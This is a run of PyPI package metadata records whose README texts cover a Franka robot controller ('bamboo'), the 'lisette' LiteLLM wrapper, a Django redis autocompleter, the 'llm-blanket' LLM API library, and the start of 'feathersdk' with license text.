Control node ZMQ port (default: 5555) - `--listen_ip`: ZMQ server listen address (default: * for all interfaces) - `--gripper_device`: Gripper device (default: /dev/ttyUSB0) - `--gripper_port`: Gripper server ZMQ port (default: 5559) - `--conda_env`: Conda environment name (default: bamboo) Other commands: - `bash RunBambooController status` - Check server status - `bash RunBambooController stop` - Stop all servers - `bash RunBambooController attach` - Attach to tmux session **Manual Start:** If you need to run servers manually, first run the C++ control node: ```bash cd controller/build ./bamboo_control_node -r <robot-ip> -p <zmq-port> [-l <listen-address>] [-m] ``` Available flags: - `-r`: Robot IP address (required) - `-p`: Port number (required) - `-l`: Listen address (default: * for all interfaces) - `-m`: Use min-jerk interpolation (default: linear) - `-h`: Show help Example: ```bash ./bamboo_control_node -r 172.16.0.2 -p 5555 -l "*" ``` Then in a new terminal, launch the Robotiq gripper server: ```bash conda activate bamboo cd controller python gripper_server.py --gripper-port <gripper-device> --zmq-port <zmq-port> ``` Example: ```bash python gripper_server.py --gripper-port /dev/ttyUSB0 --zmq-port 5559 ``` ### Client-Side Interface with robot and gripper You can verify the install by running some of the example scripts in a new terminal. To actuate the robot and print out its joint angles (*WARNING: THIS SCRIPT MOVES THE ROBOT WITHOUT DOING COLLISION CHECKING SO MAKE SURE THE NEARBY WORKSPACE IS CLEAR*): ```bash conda activate bamboo python -m bamboo.examples.joint_trajectory ``` To open and close the gripper and print the width of the fingers: ```bash conda activate bamboo python -m bamboo.examples.gripper ``` ## Development Setup If you plan to contribute to Bamboo, you'll need to set up the development tools. ### Install Development Dependencies Install the development dependencies including pre-commit, ruff, and mypy: ```bash pip install -e .[dev] ``` ### Set Up Pre-Commit Hooks Install the pre-commit hooks to automatically run linting and formatting checks before each commit: ```bash pre-commit install ``` Now, whenever you commit code, pre-commit will automatically: - Format Python code with ruff - Check Python code style with ruff ### Run Pre-Commit Manually To run all pre-commit hooks on all files without making a commit: ```bash pre-commit run --all-files ``` To run pre-commit on specific files: ```bash pre-commit run --files path/to/file.py ``` ## Contributing For Python code, we enforce style with `ruff` and type checking with `mypy`. For C++ code, we enforce style with `clang-format`. Pre-commit hooks will automatically run linting and formatting checks when you make a commit. You can also run them manually with `pre-commit run --all-files`. To contribute: 1. Fork the repository 2. Create a feature branch based on `main` 3. Install development dependencies: `pip install -e .[dev]` 4. Set up pre-commit hooks: `pre-commit install` 5. Make your changes and commit them 6. Open a pull request from your feature branch ## Acknowledgements This work draws heavily from [deoxys\_control](https://github.com/UT-Austin-RPL/deoxys_control) and [drake-franka-driver](https://github.com/RobotLocomotion/drake-franka-driver). Thanks to the developers for their open-source code!
text/markdown
Bamboo Development Team
null
null
null
null
robotics, franka, control, impedance, robot
[ "Development Status :: 4 - Beta", "Intended Audience :: Science/Research", "Operating System :: POSIX :: Linux", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.8", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: P...
[]
null
null
>=3.8
[]
[]
[]
[ "msgpack", "numpy>=1.20.0", "pyzmq>=22.0.0", "pyserial>=3.4; extra == \"server\"", "pymodbus==2.5.3; extra == \"server\"", "pre-commit>=3.0.0; extra == \"dev\"", "ruff>=0.6.0; extra == \"dev\"", "mypy>=1.0.0; extra == \"dev\"", "build; extra == \"dev\"", "twine; extra == \"dev\"" ]
[]
[]
[]
[ "Homepage, https://github.com/chsahit/bamboo", "Repository, https://github.com/chsahit/bamboo", "Issues, https://github.com/chsahit/bamboo/issues" ]
twine/6.2.0 CPython/3.10.19
2026-02-19T22:10:35.696219
bamboo_franka_client-0.1.0.tar.gz
16,257
dd/d3/7056fb10ea6dec6463e60e709254ceb07aa0683d28ba4c365ce75319b39d/bamboo_franka_client-0.1.0.tar.gz
source
sdist
null
false
84ffc0768c0a4af2d7579a402301ac26
e0ba8af2dc2e8627935359591269e38731f5f09aa94bf1af743b638df45c2b30
ddd37056fb10ea6dec6463e60e709254ceb07aa0683d28ba4c365ce75319b39d
MIT
[ "LICENSE" ]
237
2.4
lisette
0.0.38
litellm helper
# Lisette <!-- WARNING: THIS FILE WAS AUTOGENERATED! DO NOT EDIT! --> > **NB**: If you are reading this in GitHub’s readme, we recommend you > instead read the much more nicely formatted [documentation > format](https://lisette.answer.ai/) of this tutorial. *Lisette* is a wrapper for the [LiteLLM Python SDK](https://docs.litellm.ai/), which provides unified access to 100+ LLM providers using the OpenAI API format. LiteLLM provides a unified interface to access multiple LLMs, but it’s quite low level: it leaves the developer to do a lot of stuff manually. Lisette automates pretty much everything that can be automated, whilst providing full control. Amongst the features provided: - A [`Chat`](https://lisette.answer.ai/core.html#chat) class that creates stateful dialogs across any LiteLLM-supported model - Convenient message creation utilities for text, images, and mixed content - Simple and convenient support for tool calling with automatic execution - Built-in support for web search capabilities (including citations for supporting models) - Streaming responses with formatting - Full async support with [`AsyncChat`](https://lisette.answer.ai/core.html#asyncchat) - Prompt caching (for supporting models) To use Lisette, you’ll need to set the appropriate API keys as environment variables for whichever LLM providers you want to use. ## Get started LiteLLM will automatically be installed with Lisette, if you don’t already have it. ``` python !pip install lisette -qq ``` Lisette only exports the symbols that are needed to use the library, so you can use import \* to import them. Here’s a quick example showing how easy it is to switch between different LLM providers: ``` python from lisette import * ``` ## Chat ``` python models = ['claude-sonnet-4-20250514', 'gemini/gemini-2.5-flash', 'openai/gpt-4o'] for model in models: chat = Chat(model) res = chat("Please tell me about yourself in one brief sentence.") display(res) ``` I’m Claude, an AI assistant created by Anthropic to be helpful, harmless, and honest in conversations and tasks. <details> - id: `chatcmpl-xxx` - model: `claude-sonnet-4-20250514` - finish_reason: `stop` - usage: `Usage(completion_tokens=29, prompt_tokens=17, total_tokens=46, completion_tokens_details=None, prompt_tokens_details=PromptTokensDetailsWrapper(audio_tokens=None, cached_tokens=0, text_tokens=None, image_tokens=None), cache_creation_input_tokens=0, cache_read_input_tokens=0)` </details> I am a large language model, trained by Google, designed to assist with information and generate text. <details> - id: `chatcmpl-xxx` - model: `gemini-2.5-flash` - finish_reason: `stop` - usage: `Usage(completion_tokens=603, prompt_tokens=11, total_tokens=614, completion_tokens_details=CompletionTokensDetailsWrapper(accepted_prediction_tokens=None, audio_tokens=None, reasoning_tokens=583, rejected_prediction_tokens=None, text_tokens=20), prompt_tokens_details=PromptTokensDetailsWrapper(audio_tokens=None, cached_tokens=None, text_tokens=11, image_tokens=None))` </details> I’m an AI language model created by OpenAI, designed to assist with a wide range of questions and tasks by providing information and generating text-based responses. <details> - id: `chatcmpl-xxx` - model: `gpt-4o-2024-08-06` - finish_reason: `stop` - usage: `Usage(completion_tokens=30, prompt_tokens=17, total_tokens=47, completion_tokens_details=CompletionTokensDetailsWrapper(accepted_prediction_tokens=0, audio_tokens=0, reasoning_tokens=0, rejected_prediction_tokens=0, text_tokens=None), prompt_tokens_details=PromptTokensDetailsWrapper(audio_tokens=0, cached_tokens=0, text_tokens=None, image_tokens=None))` </details> That’s it! Lisette handles all the provider-specific details automatically. Each model will respond in its own style, but the interface remains the same. ## Message formatting ### Multiple messages Lisette accepts multiple messages in one go: ``` python chat = Chat(models[0]) res = chat(['Hi! My favorite drink coffee.', 'Hello!', 'Whats my favorite drink?']) display(res) ``` Hello! Based on what you just told me, your favorite drink is coffee! ☕ <details> - id: `chatcmpl-xxx` - model: `claude-sonnet-4-20250514` - finish_reason: `stop` - usage: `Usage(completion_tokens=22, prompt_tokens=23, total_tokens=45, completion_tokens_details=None, prompt_tokens_details=PromptTokensDetailsWrapper(audio_tokens=None, cached_tokens=0, text_tokens=None, image_tokens=None), cache_creation_input_tokens=0, cache_read_input_tokens=0)` </details> If you have a pre-existing message history, you can also pass it when you create the [`Chat`](https://lisette.answer.ai/core.html#chat) object: ``` python chat = Chat(models[0],hist=['Hi! My favorite drink is coffee.', 'Hello!']) res = chat('Whats my favorite drink?') display(res) ``` Your favorite drink is coffee! You just mentioned that in your previous message. <details> - id: `chatcmpl-xxx` - model: `claude-sonnet-4-20250514` - finish_reason: `stop` - usage: `Usage(completion_tokens=18, prompt_tokens=30, total_tokens=48, completion_tokens_details=None, prompt_tokens_details=PromptTokensDetailsWrapper(audio_tokens=None, cached_tokens=0, text_tokens=None, image_tokens=None), cache_creation_input_tokens=0, cache_read_input_tokens=0)` </details> ### Images Lisette also makes it easy to include images in your prompts: ``` python from pathlib import Path from IPython.display import Image ``` ``` python fn = Path('samples/puppy.jpg') img = fn.read_bytes() Image(img) ``` ![](index_files/figure-commonmark/cell-8-output-1.jpeg) All you have to do is read it in as bytes: ``` python img[:20] ``` b'\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00' And you can pass it inside a [`Chat`](https://lisette.answer.ai/core.html#chat) object: ``` python chat = Chat(models[0]) chat([img, "What's in this image? Be brief."]) ``` A cute puppy with brown and white fur lying on grass next to purple flowers. <details> - id: `chatcmpl-xxx` - model: `claude-sonnet-4-20250514` - finish_reason: `stop` - usage: `Usage(completion_tokens=20, prompt_tokens=108, total_tokens=128, completion_tokens_details=None, prompt_tokens_details=PromptTokensDetailsWrapper(audio_tokens=None, cached_tokens=0, text_tokens=None, image_tokens=None), cache_creation_input_tokens=0, cache_read_input_tokens=0)` </details> ### Prefill Some providers (e.g. Anthropic) support `prefill`, allowing you to specify how the assistant’s response should begin:” ``` python chat = Chat(models[0]) chat("Concisely, what's the meaning of life?", prefill="According to Douglas Adams,") ``` According to Douglas Adams,it’s 42. More seriously, there’s no universal answer. Common perspectives include: - Creating meaning through relationships, growth, and contribution - Fulfilling a divine purpose or spiritual calling - Maximizing well-being and minimizing suffering - Leaving a positive legacy - Simply experiencing and appreciating existence itself The meaning might be something you create rather than discover. <details> - id: `chatcmpl-xxx` - model: `claude-sonnet-4-20250514` - finish_reason: `stop` - usage: `Usage(completion_tokens=84, prompt_tokens=24, total_tokens=108, completion_tokens_details=None, prompt_tokens_details=PromptTokensDetailsWrapper(audio_tokens=None, cached_tokens=0, text_tokens=None, image_tokens=None), cache_creation_input_tokens=0, cache_read_input_tokens=0)` </details> ## Tools Lisette makes it easy to give LLMs access to Python functions. Just define a function with type hints and a docstring: ``` python def add_numbers( a: int, # First number to add b: int # Second number to add ) -> int: "Add two numbers together" return a + b ``` Now pass the function to [`Chat`](https://lisette.answer.ai/core.html#chat) and the model can use it automatically: ``` python chat = Chat(models[0], tools=[add_numbers]) res = chat("What's 47 + 23? Use the tool.") res ``` The result of 47 + 23 is 70. <details> - id: `chatcmpl-xxx` - model: `claude-sonnet-4-20250514` - finish_reason: `stop` - usage: `Usage(completion_tokens=18, prompt_tokens=573, total_tokens=591, completion_tokens_details=None, prompt_tokens_details=PromptTokensDetailsWrapper(audio_tokens=None, cached_tokens=0, text_tokens=None, image_tokens=None), cache_creation_input_tokens=0, cache_read_input_tokens=0)` </details> If you want to see all intermediate messages and outputs you can use the `return_all=True` feature. ``` python chat = Chat(models[0], tools=[add_numbers]) res = chat("What's 47 + 23 + 59? Use the tool.",max_steps=3,return_all=True) display(*res) ``` I’ll help you calculate 47 + 23 + 59 using the add_numbers tool. Since the tool can only add two numbers at a time, I’ll need to do this in two steps. 🔧 add_numbers({“a”: 47, “b”: 23}) <details> - id: `chatcmpl-xxx` - model: `claude-sonnet-4-20250514` - finish_reason: `tool_calls` - usage: `Usage(completion_tokens=116, prompt_tokens=433, total_tokens=549, completion_tokens_details=None, prompt_tokens_details=PromptTokensDetailsWrapper(audio_tokens=None, cached_tokens=0, text_tokens=None, image_tokens=None), cache_creation_input_tokens=0, cache_read_input_tokens=0)` </details> {'tool_call_id': 'toolu_01F9oakoP8ANHkTMD1DyQDi7', 'role': 'tool', 'name': 'add_numbers', 'content': '70'} Now I’ll add the result (70) to the third number (59): 🔧 add_numbers({“a”: 70, “b”: 59}) <details> - id: `chatcmpl-xxx` - model: `claude-sonnet-4-20250514` - finish_reason: `tool_calls` - usage: `Usage(completion_tokens=87, prompt_tokens=562, total_tokens=649, completion_tokens_details=None, prompt_tokens_details=PromptTokensDetailsWrapper(audio_tokens=None, cached_tokens=0, text_tokens=None, image_tokens=None), cache_creation_input_tokens=0, cache_read_input_tokens=0)` </details> {'tool_call_id': 'toolu_01Cdf3FHJdbx64F8H8ooE1Db', 'role': 'tool', 'name': 'add_numbers', 'content': '129'} The answer is **129**. I calculated this by first adding 47 + 23 = 70, then adding 70 + 59 = 129. <details> - id: `chatcmpl-xxx` - model: `claude-sonnet-4-20250514` - finish_reason: `stop` - usage: `Usage(completion_tokens=41, prompt_tokens=702, total_tokens=743, completion_tokens_details=None, prompt_tokens_details=PromptTokensDetailsWrapper(audio_tokens=None, cached_tokens=0, text_tokens=None, image_tokens=None), cache_creation_input_tokens=0, cache_read_input_tokens=0)` </details> It shows the intermediate tool calls, and the tool results! ## Web search Some models support web search capabilities. Lisette makes this easy to use: ``` python chat = Chat(models[0], search='l') # 'l'ow, 'm'edium, or 'h'igh search context res = chat("Please tell me one fun fact about otters. Keep it brief") res ``` Here’s a fun fact about otters: Sea otters allow themselves to get entangled in kelp forests - this creates a tether so they don’t drift away on sleep currents as they sleep. They essentially use kelp as a natural anchor to stay in place while floating and resting on the water’s surface! <details> - id: `chatcmpl-xxx` - model: `claude-sonnet-4-20250514` - finish_reason: `stop` - usage: `Usage(completion_tokens=143, prompt_tokens=15626, total_tokens=15769, completion_tokens_details=None, prompt_tokens_details=PromptTokensDetailsWrapper(audio_tokens=None, cached_tokens=0, text_tokens=None, image_tokens=None), server_tool_use=ServerToolUse(web_search_requests=1), cache_creation_input_tokens=0, cache_read_input_tokens=0)` </details> > [!TIP] > > Some providers (like Anthropic) provide citations for their search > results. ``` python res.choices[0].message.provider_specific_fields ``` {'citations': [[{'type': 'web_search_result_location', 'cited_text': 'Sea Otters allow themselves to get entangled in kelp forests this creates a tether so they don’t drift away on sleep currents as they sleep. ', 'url': 'https://www.mygreenworld.org/blog/facts-about-otters', 'title': 'Five Fast Facts about Otters — My Green World', 'encrypted_index': 'EpABCioIBxgCIiQ4ODk4YTFkYy0yMTNkLTRhNmYtOTljYi03ZTBlNTUzZDc0NWISDCMi/kxdYrQXVUX+ZxoMVvW3BHE29cyMhwAFIjBZEBw3PaH+XAslsXWMNucD7FqSwe5Fnnsfh2RzTX9x/q9XQ1Mm1Ke6JOreehNzVI0qFDkJYT4NCX8U4CjHHwoyLKtY66vhGAQ='}]], 'thinking_blocks': None} ## Streaming For real-time responses, use `stream=True` to get chunks as they’re generated rather than waiting for the complete response: ``` python chat = Chat(models[0]) res_gen = chat("Concisely, what are the top 10 biggest animals?", stream=True) res_gen ``` <generator object Chat._call> ``` python from litellm import ModelResponse, ModelResponseStream ``` You can loop over the generator to get the partial responses: ``` python for chunk in res_gen: if isinstance(chunk,ModelResponseStream): print(chunk.choices[0].delta.content,end='') ``` Here are the top 10 biggest animals by size/weight: 1. **Blue whale** - largest animal ever, up to 100 feet long 2. **Fin whale** - second-largest whale, up to 85 feet 3. **Bowhead whale** - up to 65 feet, very heavy build 4. **Right whale** - up to 60 feet, extremely bulky 5. **Sperm whale** - up to 67 feet, largest toothed whale 6. **Gray whale** - up to 50 feet 7. **Humpback whale** - up to 52 feet 8. **African elephant** - largest land animal, up to 13 feet tall 9. **Colossal squid** - up to 46 feet long (largest invertebrate) 10. **Giraffe** - tallest animal, up to 18 feet tall *Note: Various whale species dominate due to the ocean's ability to support massive body sizes.*None And the final chunk is the complete `ModelResponse`: ``` python chunk ``` Here are the top 10 biggest animals by size/weight: 1. **Blue whale** - largest animal ever, up to 100 feet long 2. **Fin whale** - second-largest whale, up to 85 feet 3. **Bowhead whale** - up to 65 feet, very heavy build 4. **Right whale** - up to 60 feet, extremely bulky 5. **Sperm whale** - up to 67 feet, largest toothed whale 6. **Gray whale** - up to 50 feet 7. **Humpback whale** - up to 52 feet 8. **African elephant** - largest land animal, up to 13 feet tall 9. **Colossal squid** - up to 46 feet long (largest invertebrate) 10. **Giraffe** - tallest animal, up to 18 feet tall *Note: Various whale species dominate due to the ocean’s ability to support massive body sizes.* <details> - id: `chatcmpl-xxx` - model: `claude-sonnet-4-20250514` - finish_reason: `stop` - usage: `Usage(completion_tokens=233, prompt_tokens=22, total_tokens=255, completion_tokens_details=CompletionTokensDetailsWrapper(accepted_prediction_tokens=None, audio_tokens=None, reasoning_tokens=0, rejected_prediction_tokens=None, text_tokens=None), prompt_tokens_details=None)` </details> ## Async For web applications and concurrent operations, like in [FastHTML](https://fastht.ml), we recommend using [`AsyncChat`](https://lisette.answer.ai/core.html#asyncchat): ``` python chat = AsyncChat(models[0]) await chat("Hi there") ``` Hello! How are you doing today? Is there anything I can help you with? <details> - id: `chatcmpl-xxx` - model: `claude-sonnet-4-20250514` - finish_reason: `stop` - usage: `Usage(completion_tokens=20, prompt_tokens=9, total_tokens=29, completion_tokens_details=None, prompt_tokens_details=PromptTokensDetailsWrapper(audio_tokens=None, cached_tokens=0, text_tokens=None, image_tokens=None), cache_creation_input_tokens=0, cache_read_input_tokens=0)` </details> To wrap up, we’ll show an example of async + streaming + toolcalling + search: ``` python chat = AsyncChat(models[0], search='l', tools=[add_numbers]) res = await chat("""\ Search the web for the avg weight, in kgs, of male African and Asian elephants. Then add the two. Keep your replies ultra concise! Dont search the web more than once please. """, max_steps=4, stream=True) await adisplay_stream(res) # this is a convenience function to make async streaming look great in notebooks! ``` Based on the search results: **Male African elephants**: [\*](https://www.africa-safaris.com/How-Much-Does-An-Elephant-Weigh "How Much Does An Elephant Weigh") [\*](https://www.quora.com/What-is-the-average-weight-of-an-adult-African-elephant-in-pounds-and-tons "What is the average weight of an adult African elephant in pounds and tons? - Quora") Average weight is 5,000 kg (11,000 pounds) **Male Asian elephants**: [\*](https://www.ifaw.org/international/journal/difference-african-asian-elephants "African Elephants vs. Asian Elephants | IFAW") [\*](https://www.ifaw.org/international/journal/difference-african-asian-elephants "African Elephants vs. Asian Elephants | IFAW") Average weight is 3,600 kg (7,900 pounds) <details class="tool-usage-details"> `add_numbers({"a": 5000, "b": 3600})` - `8600` </details> **Total**: 8,600 kg ## Next steps Ready to dive deeper? - Check out the rest of the [documentation](https://lisette.answer.ai/core.html). - Visit the [GitHub repository](https://github.com/answerdotai/lisette) to contribute or report issues. - Join our [Discord community](https://discord.gg/y7cDEX7r)!
text/markdown
null
AnswerDotAI <support@answer.ai>
null
null
Apache-2.0
nbdev, jupyter, notebook, python
[ "Natural Language :: English", "Intended Audience :: Developers", "Development Status :: 3 - Alpha", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3 :: Only" ]
[]
null
null
>=3.9
[]
[]
[]
[ "litellm", "numpydoc", "toolslm>=0.3.29", "fastcore>=1.9.2", "ipython; extra == \"dev\"", "pycachy>=0.0.6; extra == \"dev\"", "fastlite; extra == \"dev\"", "nbdev; extra == \"dev\"", "pillow; extra == \"dev\"" ]
[]
[]
[]
[ "Repository, https://github.com/AnswerDotAI/lisette", "Documentation, https://lisette.answer.ai/" ]
twine/6.2.0 CPython/3.12.0
2026-02-19T22:10:18.932539
lisette-0.0.38.tar.gz
28,641
64/c4/f9bb7d4f05efb503e81a12461c52bfeb167ef4d2e46da0e7bba8c6491e89/lisette-0.0.38.tar.gz
source
sdist
null
false
e5e596240251fe8593a97725de1ffe45
45da1ee9334643490a7e3196695905f6e0712a539735dd49983f24546103b8d4
64c4f9bb7d4f05efb503e81a12461c52bfeb167ef4d2e46da0e7bba8c6491e89
null
[ "LICENSE" ]
427
2.4
django-redis-autocompleter
1.1.4
A redis-backed autocompleter for Django projects.
&nbsp; [![PyPI](https://img.shields.io/pypi/v/django-redis-autocompleter)](https://pypi.org/project/django-redis-autocompleter/) [![Test Suite](https://github.com/ycharts/django-autocompleter/actions/workflows/main.yml/badge.svg?branch=master)](https://github.com/ycharts/django-autocompleter/actions/workflows/main.yml) [![Coverage Status](https://coveralls.io/repos/github/ycharts/django-autocompleter/badge.svg?branch=master)](https://coveralls.io/github/ycharts/django-autocompleter?branch=master) django-redis-autocompleter is a redis-backed autocompleter for Django. It provides, fast, seamless autocompletion for Django models with a minimum of effort. ## Contributors ✨ Thanks goes to these wonderful people. <!-- ALL-CONTRIBUTORS-LIST:START - Do not remove or modify this section --> <!-- prettier-ignore-start --> <!-- markdownlint-disable --> <table> <tr> <td align="center"><img src="https://avatars.githubusercontent.com/u/83293?v=4" width="100px;" alt="Ara Anjargolian"/><br /><sub><b><a href="https://github.com/ara818">@ara818</a></b></sub></td> <td align="center"><img src="https://avatars.githubusercontent.com/u/2000316?v=4" width="100px;" alt="Kevin Fox"/><br /><sub><b><a href="https://github.com/KFoxder">@kfoxder</a></b></sub></td> <td align="center"><img src="https://avatars.githubusercontent.com/u/3022071?v=4" width="100px;" alt="Tom Jakeway"/><br /><sub><b><a href="https://github.com/Jakeway">@jakeway</a></b></sub></td> </tr> </table> <!-- markdownlint-enable --> <!-- prettier-ignore-end --> <!-- ALL-CONTRIBUTORS-LIST:END -->
text/markdown
null
Ara Anjargolian <ara818@gmail.com>, Kevin Fox <kevin_fox@me.com>
null
null
null
autocompleter, django
[ "Programming Language :: Python :: 3", "Environment :: Web Environment", "Intended Audience :: Developers", "Operating System :: OS Independent", "Framework :: Django" ]
[]
null
null
>=3.7
[]
[]
[]
[ "Django<6.0,>=3.2.0", "hiredis>=1", "redis>=3" ]
[]
[]
[]
[ "Homepage, https://github.com/ycharts/django-autocompleter", "Bug Tracker, https://github.com/ycharts/django-autocompleter/issues" ]
twine/6.2.0 CPython/3.14.2
2026-02-19T22:10:17.888683
django_redis_autocompleter-1.1.4.tar.gz
22,984
2c/4e/8ffad8ea4baddf1105b814f052a26c3ec7841d58fecee49ee5749f554d33/django_redis_autocompleter-1.1.4.tar.gz
source
sdist
null
false
ebe2b7ba962ea690d49da8d3fd7a3de3
b73c0b2dacfa60b5414ba2733b6c2b74464d31d5b76a60380140f14afc8cc740
2c4e8ffad8ea4baddf1105b814f052a26c3ec7841d58fecee49ee5749f554d33
null
[]
223
2.4
llm-blanket
0.1.1
Unified Python library for LLM APIs (OpenAI, Anthropic, Gemini, xAI, Groq, custom)
# llm-blanket Unified Python library for LLM APIs: **OpenAI**, **Anthropic**, **Gemini**, **xAI (Grok)**, **Groq**, and **custom OpenAI-compatible** endpoints. - Single interface: specify a model, get an LLM instance, call `invoke(messages)`. - Provider inferred from model name (e.g. `gpt-4o` → OpenAI, `claude-3-5-sonnet` → Anthropic) or set explicitly. - Base URL overrides via config or `base_url` / `base_urls` for custom or proxy endpoints. - API keys from environment (LangChain/AutoGen-style) or passed in config. ## Install ```bash pip install llm-blanket ``` Optional provider dependencies (install only what you use): ```bash pip install "llm-blanket[openai]" # OpenAI + Groq + xAI + custom (OpenAI-compatible) pip install "llm-blanket[anthropic]" # Anthropic Claude pip install "llm-blanket[gemini]" # Google Gemini pip install "llm-blanket[all]" # All providers ``` ## Examples Runnable scripts are in the [examples/](examples/) directory: - **[examples/quickstart.py](examples/quickstart.py)** – create an LLM and call `invoke()` with a user message. - **[examples/streaming.py](examples/streaming.py)** – stream tokens with `invoke_stream()`. - **[examples/config_and_url_override.py](examples/config_and_url_override.py)** – `LLMConfig`, `base_urls`, `base_url`, and explicit `provider`. Run from the repo root (set the appropriate API key first): ```bash OPENAI_API_KEY=sk-... python examples/quickstart.py ``` ## Quick start ```python from llm_blanket import get_llm, Message # Provider inferred from model name llm = get_llm("gpt-4o") # Option 1: system and user as named arguments resp = llm.invoke(system="You are helpful.", user="Hello!") print(resp.content) # Option 2: messages list (Message objects or OpenAI-style dicts) resp = llm.invoke([Message("user", "Hi")]) resp = llm([{"role": "user", "content": "Hi"}]) # Option 3: common parameters (temperature, max_tokens, etc.) are passed through to the provider resp = llm.invoke(user="Hello!", temperature=0.7, max_tokens=256) # Streaming: same signature as invoke(), yields StreamChunk (content delta, optional finish_reason) for chunk in llm.invoke_stream(user="Hello!", temperature=0.7): print(chunk.content, end="", flush=True) print() ``` ## Streaming Use `invoke_stream()` with the same arguments as `invoke()`. It yields `StreamChunk` objects (`.content` is the text delta; `.finish_reason` is set on the final chunk when the provider supplies it): ```python from llm_blanket import get_llm llm = get_llm("gpt-4o-mini") for chunk in llm.invoke_stream(system="You are concise.", user="Count to 5."): print(chunk.content, end="", flush=True) if chunk.finish_reason: print(f"\n[Done: {chunk.finish_reason}]") ``` Streaming is supported for OpenAI (and OpenAI-compatible), Anthropic, and Gemini. ## Configuration ### API keys By default, API keys are read from the environment. Use standard names so you can reuse `.env` or shell exports: | Provider | Environment variable | |----------|----------------------| | OpenAI | `OPENAI_API_KEY` | | Anthropic| `ANTHROPIC_API_KEY` | | Gemini | `GOOGLE_API_KEY` | | xAI | `XAI_API_KEY` | | Groq | `GROQ_API_KEY` | | Custom | `OPENAI_API_KEY` (or pass explicitly) | Override in code: ```python from llm_blanket import get_llm, LLMConfig config = LLMConfig(api_key="sk-...") llm = get_llm("gpt-4o", config=config) # Or one-off llm = get_llm("gpt-4o", api_key="sk-...") ``` ### Base URL and URL mapping Override the base URL for a given client (e.g. custom or proxy): ```python # Single override for this client llm = get_llm("gpt-4o", base_url="https://my-gateway.com/v1") # Or via config with a mapping (e.g. per provider or per model) config = LLMConfig( base_urls={ "openai": "https://my-openai-proxy.com/v1", "gpt-4o": "https://special-endpoint.com/v1", } ) llm = get_llm("gpt-4o", config=config) ``` Resolution order: `base_url` (direct) > `base_urls[model]` > `base_urls[provider]` > default URL for that provider. ### Forcing provider Use when the model name doesn’t indicate the provider (e.g. Groq’s `llama-3-70b-8192`): ```python llm = get_llm("llama-3-70b-8192", provider="groq") ``` ## Supported models / providers | Provider | Inferred from | Notes | |-----------|--------------------|--------------------------| | OpenAI | `gpt-*`, `o1-*`, `o3-*` | Default base: `https://api.openai.com/v1` | | Anthropic | `claude-*` | Uses Anthropic Messages API | | Gemini | `gemini-*` | Uses Google GenAI SDK | | xAI | `grok*`, `grok-*` | OpenAI-compatible | | Groq | Set `provider="groq"` | Models like `llama-3-70b-8192`; OpenAI-compatible | | Custom | Set `provider="custom"` and `base_url` | Any OpenAI-compatible endpoint | ## Extensibility - **Unified response**: `invoke()` returns an `LLMResponse` with `content`, `model`, `usage`, `finish_reason`, and optional `raw` (provider-specific object) and `tool_calls`. - **Provider-specific options**: Pass extra kwargs to `invoke()` (e.g. `temperature`, `max_tokens`); they are forwarded to the underlying API. Use `LLMConfig(extra={...})` for client-level options. - **Custom backends**: Implement `BaseLLM` (see `llm_blanket.base`) and register or construct your backend explicitly; the factory is focused on the built-in providers. ## Example: multiple providers and URL overrides ```python from llm_blanket import get_llm, LLMConfig, Message # Shared URL mapping (e.g. from app config) config = LLMConfig( base_urls={ "openai": "https://my-proxy.com/openai/v1", "groq": "https://api.groq.com/openai/v1", } ) openai_llm = get_llm("gpt-4o-mini", config=config) groq_llm = get_llm("llama-3-70b-8192", config=config, provider="groq") for llm in [openai_llm, groq_llm]: r = llm.invoke([Message("user", "Say hi in one word.")]) print(f"{llm.provider}: {r.content}") ``` ## License MIT
text/markdown
Yoseph Berhanu Alebachew
null
null
null
MIT
llm, openai, anthropic, gemini, groq, xai, api
[ "Development Status :: 3 - Alpha", "Intended Audience :: Developers", "License :: OSI Approved :: MIT License", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Programming Language :: Python :: 3.12", "Topic :: Scientific/Engi...
[]
null
null
>=3.10
[]
[]
[]
[ "httpx>=0.25", "openai>=1.0; extra == \"openai\"", "anthropic>=0.39; extra == \"anthropic\"", "google-genai>=1.0; extra == \"gemini\"", "llm-blanket[anthropic,gemini,openai]; extra == \"all\"" ]
[]
[]
[]
[ "Repository, https://github.com/yosephberhanu/llm-blanket" ]
twine/6.1.0 CPython/3.13.7
2026-02-19T22:08:54.625469
llm_blanket-0.1.1.tar.gz
12,363
db/36/dbd2b9f3a742369d335671338a04a328b95717423852a8a9b47b7f91450b/llm_blanket-0.1.1.tar.gz
source
sdist
null
false
2c254737ec837d255b346fe8e8087b0d
c52677a1277de923e60c8b6b9e7b96a2707ea4fdfc160532b8f0a9fe911eabe0
db36dbd2b9f3a742369d335671338a04a328b95717423852a8a9b47b7f91450b
null
[]
228
2.4
feathersdk
0.0.11
Feather Robotics Python SDK Library
# Feather Python SDK Library [![License: Apache 2.0](https://img.shields.io/badge/license-Apache%20License%202.0-blue)](https://www.apache.org/licenses/LICENSE-2.0) [![PyPI](https://img.shields.io/pypi/v/feathersdk)](https://pypi.org/project/feathersdk/) [![Supported Versions](https://img.shields.io/pypi/pyversions/feathersdk.svg)](https://pypi.org/project/feathersdk/) ## Installation You can install with: ```bash pip install feathersdk ```
text/markdown
Feather Robotics Inc.
null
null
null
Apache License Version 2.0, January 2004 http://www.apache.org/licenses/ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 1. Definitions. "License" shall mean the terms and conditions for use, reproduction, and distribution as defined by Sections 1 through 9 of this document. "Licensor" shall mean the copyright owner or entity authorized by the copyright owner that is granting the License. "Legal Entity" shall mean the union of the acting entity and all other entities that control, are controlled by, or are under common control with that entity. For the purposes of this definition, "control" means (i) the power, direct or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding shares, or (iii) beneficial ownership of such entity. "You" (or "Your") shall mean an individual or Legal Entity exercising permissions granted by this License. "Source" form shall mean the preferred form for making modifications, including but not limited to software source code, documentation source, and configuration files. "Object" form shall mean any form resulting from mechanical transformation or translation of a Source form, including but not limited to compiled object code, generated documentation, and conversions to other media types. "Work" shall mean the work of authorship, whether in Source or Object form, made available under the License, as indicated by a copyright notice that is included in or attached to the work (an example is provided in the Appendix below). "Derivative Works" shall mean any work, whether in Source or Object form, that is based on (or derived from) the 